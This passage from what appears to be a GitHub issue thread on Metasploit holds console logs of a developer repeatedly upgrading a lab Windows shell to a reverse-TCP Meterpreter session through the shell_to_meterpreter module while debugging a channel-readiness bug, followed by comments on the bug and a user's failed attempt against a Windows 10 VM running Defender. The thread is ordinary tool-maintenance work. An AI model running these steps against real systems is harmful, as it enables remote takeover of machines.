[*] Powershell command length: 5451
[*] Cleaning up handler
[*] Post module execution completed
msf post(shell_to_meterpreter) > 
[*] Sending stage (956991 bytes) to 172.16.137.133
[*] Meterpreter session 11 opened (172.16.137.130:4433 -> 172.16.137.133:49443) at 2017-07-15 22:03:29 -0400

msf post(shell_to_meterpreter) > sessions -k 11
[*] Killing the following session(s): 11
[*] Killing session 11
[*] 172.16.137.133 - Meterpreter session 11 closed.
msf post(shell_to_meterpreter) > use post/multi/manage/test
msf post(test) > run

[-] no
[-] no
[-] no
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > run

[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > use post/multi/manage/shell_to_meterpreter 
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 4
[*] Platform: Windows
[*] Upgrade payload: windows/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[*] Transfer method: Powershell
[*] Powershell command length: 5475
[*] Cleaning up handler
[*] Post module execution completed
msf post(shell_to_meterpreter) > 
[*] Sending stage (956991 bytes) to 172.16.137.133
[*] Meterpreter session 12 opened (172.16.137.130:4433 -> 172.16.137.133:49450) at 2017-07-15 22:04:38 -0400

msf post(shell_to_meterpreter) > sessions -k 12
[*] Killing the following session(s): 12
[*] Killing session 12
[*] 172.16.137.133 - Meterpreter session 12 closed.
msf post(shell_to_meterpreter) > use post/multi/manage/test
msf post(test) > run

[-] no
[-] no
[-] no
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > use post/multi/manage/shell_to_meterpreter 
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 4
[*] Platform: Windows
[*] Upgrade payload: windows/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.137.130:4433 
[*] Starting the payload handler...
[*] Transfer method: Powershell
[*] Powershell command length: 5495
[*] Cleaning up handler
[*] Post module execution completed
msf post(shell_to_meterpreter) > 
[*] Sending stage (956991 bytes) to 172.16.137.133
[*] Meterpreter session 13 opened (172.16.137.130:4433 -> 172.16.137.133:49457) at 2017-07-15 22:05:45 -0400

msf post(shell_to_meterpreter) > sessions -k 13
[*] Killing the following session(s): 13
[*] Killing session 13
[*] 172.16.137.133 - Meterpreter session 13 closed.
msf post(shell_to_meterpreter) > 
msf post(shell_to_meterpreter) > echo 'ok, lets wait 5 minutes before trying again'
[*] exec: echo 'ok, lets wait 5 minutes before trying again'

ok, lets wait 5 minutes before trying again
msf post(shell_to_meterpreter) > use post/multi/manage/test
msf post(test) > run

[-] no
[-] no
[-] no
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
[+] yes
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(test) > echo computersaysno.jpg :(
[*] exec: echo computersaysno.jpg :(

sh: 1: Syntax error: "(" unexpected
```

**Comment by bcoles** [comment]
Running the test module until it starts returning `yes` indicates that the channel is ready. The shell_to_meterpreter module will detect powershell and function normally.

This is related to the channel and not related to elapsed time, as demonstrated by the last test where I waited 5 minutes before executing the test module.

**Comment by verapex** [comment]
hey all..
attacker 4.19.0-kali5-amd64
victim VM win10 full update and active Defender...

i opened shell session ;
1         shell x64/windows  Windows PowerShell 

and i try shell_to_meterpreter... and finally ;
[*] Command stager progress: 100.00% (102108/102108 bytes)

but i try 3 times and sessions 2 dont start.. i didnt it...  why ?

**Comment by bcoles** [comment]
@verapex if you have an issue please create a [new issue](https://github.com/rapid7/metasploit-framework/issues/new), demonstrating what you have done, what you expected to happen, what happened instead, and what you have done in an attempt to resolve the issue. Provide terminal output.

**Comment by verapex** [comment]
ok thx. i did...
